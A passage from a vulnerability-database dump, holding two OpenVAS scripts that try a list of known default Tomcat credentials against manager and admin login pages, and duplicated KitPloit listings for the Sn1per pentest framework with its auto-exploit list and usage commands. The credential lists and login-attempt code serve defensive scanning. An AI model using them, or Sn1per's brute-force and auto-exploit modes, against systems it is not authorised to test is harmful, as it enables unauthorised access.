dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\n# nb: Keep in sync with 2015/sw_tomcat_admin_default_credentials.nasl\ncredentials = make_list( \"admin:admin\", # Taken from various example files / documentations as well as from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown and https://www.ikkisoft.com/stuff/TomcatSec_LucaCarettoni.pdf\n \"admin:changethis\",\n \"admin:password\",\n \"admin:Password1\",\n \"admin:password1\",\n \"admin:vagrant\",\n \"both:tomcat\",\n \"manager:manager\",\n \"password:password\",\n \"role:changethis\",\n \"role1:role1\",\n \"role1:tomcat\",\n \"role1:tomcat7\",\n \"root:changethis\",\n \"root:password\",\n \"root:Password1\",\n \"root:password1\",\n \"root:r00t\",\n \"root:root\",\n \"root:toor\",\n \"scott:tiger\", # Oracle freaks\n \"tomcat:admin\",\n \"tomcat:changethis\",\n \"tomcat:j5Brn9\", # Sun Solaris installation\n \"tomcat:none\",\n \"tomcat:password\",\n \"tomcat:Password1\",\n \"tomcat:password1\",\n \"tomcat:tomcat\",\n \"ADMIN:ADMIN\", # https://nvd.nist.gov/vuln/detail/CVE-2010-4094\n \"admin:none\", # https://nvd.nist.gov/vuln/detail/CVE-2009-3548\n \"admin:tomcat\", # https://github.com/seshendra/vagrant-ubuntu-tomcat7/blob/abd0a6c9cf08f8db642bde33ce7491259247ce18/manifests/default.pp#L49-L50\n \"ovwebusr:OvW*busr1\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4189, https://nvd.nist.gov/vuln/detail/CVE-2009-3099 and https://nvd.nist.gov/vuln/detail/CVE-2009-3843\n \"j2deployer:j2deployer\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4188\n \"tomcat:s3cret\", # https://github.com/apache/tomcat/blob/2b8f9665dbfb89c78878784cd9b63d2b976ba623/webapps/manager/WEB-INF/jsp/403.jsp#L66\n \"cxsdk:kdsxc\", # https://nvd.nist.gov/vuln/detail/CVE-2010-0557\n \"xampp:xampp\", # XAMPP from https://www.apachefriends.org/index.html\n \"QCC:QLogic66\", # QLogic QConvergeConsole from http://www.qlogic.com/\n \"root:owaspbwa\", # OWASP Broken Web Applications 
Project\n \"fhir:FHIRDefaultPassword\" ); # HAPI FHIR from http://hapifhir.io/\n\n# nb: This is expected to be here, the port will be added with a later call...\nhost = http_host_name( dont_add_port:TRUE );\n\nvuln = FALSE;\nreport = \"\"; # nb: To make openvas-nasl-lint happy...\n\n# nb: Set by gb_apache_tomcat_consolidation.nasl\nauthRequireUrls = get_kb_list( \"www/\" + host + \"/\" + port + \"/ApacheTomcat/auth_required\" );\nif( isnull( authRequireUrls ) )\n exit( 0 );\n\n# Sort to not report changes on delta reports if just the order is different\nauthRequireUrls = sort( authRequireUrls );\n\nuseragent = http_get_user_agent();\nhost = http_host_name( port:port );\n\nforeach url( authRequireUrls ) {\n\n foreach credential( credentials ) {\n\n user_pass = split( credential, sep:\":\", keep:FALSE );\n\n user = chomp( user_pass[0] );\n pass = chomp( user_pass[1] );\n\n if( tolower( pass ) == \"none\" ) pass = \"\";\n\n userpass = string( user, \":\", pass );\n userpass64 = base64( str:userpass );\n\n req = string( \"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Authorization: Basic \", userpass64, \"\\r\\n\",\n \"\\r\\n\" );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( res =~ \"^HTTP/1\\.[01] 200\" && \"Tomcat Web Application Manager\" >< res ) {\n report += \"It was possible to login into the Tomcat Manager at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n } else if( res =~ \"^HTTP/1\\.[01]\" && \"Tomcat Virtual Host Manager\" >< res ) {\n report += \"It was possible to login into the Tomcat Host Manager at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n } else if( res =~ \"^HTTP/1\\.[01]\" && \"Server Status\" >< res && \"Complete Server Status\" >< res ) 
{\n report += \"It was possible to login into the Tomcat Server Status at \" + http_report_vuln_url( port:port, url:url, url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"\\n\\n';\n vuln = TRUE;\n }\n }\n}\n\nif( vuln ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:23:53", "description": "The Apache Tomcat Server Administration is using default or known\n hardcoded credentials.", "cvss3": {}, "published": "2015-04-10T00:00:00", "type": "openvas", "title": "Apache Tomcat Server Administration Default/Hardcoded Credentials", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2009-3099", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310111013", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310111013", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat Server Administration Unauthorized Access Vulnerability\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (C) 2015 SCHUTZWERK GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.111013\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-4094\", \"CVE-2009-3548\", \"CVE-2009-4189\", \"CVE-2009-3099\", \"CVE-2009-3843\",\n \"CVE-2009-4188\", \"CVE-2010-0557\");\n script_bugtraq_id(44172, 36954, 79264, 79351, 37086, 36258, 38084);\n script_name(\"Apache Tomcat Server Administration Default/Hardcoded Credentials\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-04-10 15:00:00 +0200 (Fri, 10 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2015 SCHUTZWERK GmbH\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"apache/tomcat/http/detected\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-10-214/\");\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-085/\");\n\n script_tag(name:\"solution\", value:\"Change the password to a strong one or remove the user from tomcat-users.xml.\");\n\n script_tag(name:\"summary\", value:\"The Apache Tomcat Server Administration is using default or known\n hardcoded 
credentials.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain\n access to sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) )\n exit( 0 );\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nreq = http_get( item:\"/admin/\", port:port );\nres = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\ncookie = eregmatch( pattern:\"JSESSIONID=([0-9A-Z]+);\", string:res );\nif( isnull( cookie[1] ) )\n exit( 0 );\n\nif( \"Tomcat Server Administration\" >!< res )\n exit( 0 );\n\n# nb: Keep in sync with 2012/gb_tomcat_default_credentials.nasl\ncredentials = make_list( \"admin:admin\", # Taken from various example files / documentations as well as from https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown and https://www.ikkisoft.com/stuff/TomcatSec_LucaCarettoni.pdf\n \"admin:changethis\",\n \"admin:password\",\n \"admin:Password1\",\n \"admin:password1\",\n \"admin:vagrant\",\n \"both:tomcat\",\n \"manager:manager\",\n \"password:password\",\n \"role:changethis\",\n \"role1:role1\",\n \"role1:tomcat\",\n \"role1:tomcat7\",\n \"root:changethis\",\n \"root:password\",\n \"root:Password1\",\n \"root:password1\",\n \"root:r00t\",\n \"root:root\",\n \"root:toor\",\n \"scott:tiger\", # Oracle freaks\n \"tomcat:admin\",\n \"tomcat:changethis\",\n \"tomcat:j5Brn9\", # Sun Solaris installation\n \"tomcat:none\",\n \"tomcat:password\",\n \"tomcat:Password1\",\n \"tomcat:password1\",\n \"tomcat:tomcat\",\n \"ADMIN:ADMIN\", # 
https://nvd.nist.gov/vuln/detail/CVE-2010-4094\n \"admin:none\", # https://nvd.nist.gov/vuln/detail/CVE-2009-3548\n \"admin:tomcat\", # https://github.com/seshendra/vagrant-ubuntu-tomcat7/blob/abd0a6c9cf08f8db642bde33ce7491259247ce18/manifests/default.pp#L49-L50\n \"ovwebusr:OvW*busr1\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4189, https://nvd.nist.gov/vuln/detail/CVE-2009-3099 and https://nvd.nist.gov/vuln/detail/CVE-2009-3843\n \"j2deployer:j2deployer\", # https://nvd.nist.gov/vuln/detail/CVE-2009-4188\n \"tomcat:s3cret\", # https://github.com/apache/tomcat/blob/2b8f9665dbfb89c78878784cd9b63d2b976ba623/webapps/manager/WEB-INF/jsp/403.jsp#L66\n \"cxsdk:kdsxc\", # https://nvd.nist.gov/vuln/detail/CVE-2010-0557\n \"xampp:xampp\", # XAMPP from https://www.apachefriends.org/index.html\n \"QCC:QLogic66\", # QLogic QConvergeConsole from http://www.qlogic.com/\n \"root:owaspbwa\", # OWASP Broken Web Applications Project\n \"fhir:FHIRDefaultPassword\" ); # HAPI FHIR from http://hapifhir.io/\n\nvuln = FALSE;\nreport = \"\";\n\nhost = http_host_name( port:port );\nuseragent = http_get_user_agent();\nforeach credential( credentials ) {\n\n user_pass = split( credential, sep:\":\", keep:FALSE );\n\n user = chomp( user_pass[0] );\n pass = chomp( user_pass[1] );\n\n if( tolower( pass ) == \"none\" ) pass = \"\";\n\n data = string( \"j_username=\" + user + \"&j_password=\" + pass );\n len = strlen( data );\n\n req = 'POST /admin/j_security_check;jsessionid=' + cookie[1] + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' +\n data;\n res = http_keepalive_send_recv( 
port:port, data:req, bodyonly:FALSE );\n\n if( res =~ \"^HTTP/1\\.[01] 302\" && \"/admin/\" >< res ) {\n\n req = 'GET /admin/ HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n req = 'GET /admin/banner.jsp HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Referer: http://' + host + '/admin/\\r\\n' +\n 'Cookie: JSESSIONID=' + cookie[1] + '\\r\\n' +\n 'Connection: keep-alive\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( \"/admin/commitChanges.do\" >< res ) {\n report += \"It was possible to login into the Tomcat Server Administration at \" + http_report_vuln_url( port:port, url:\"/admin/index.jsp\", url_only:TRUE ) + ' using user \"' + user + '\" with password \"' + pass + '\"';\n vuln = TRUE;\n }\n }\n}\n\nif( vuln ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-12-04T15:31:07", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. 
Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. 
whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous 
FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] 
UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). 
Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": 
"http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-04T15:31:27", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n 
\n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * 
Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT 
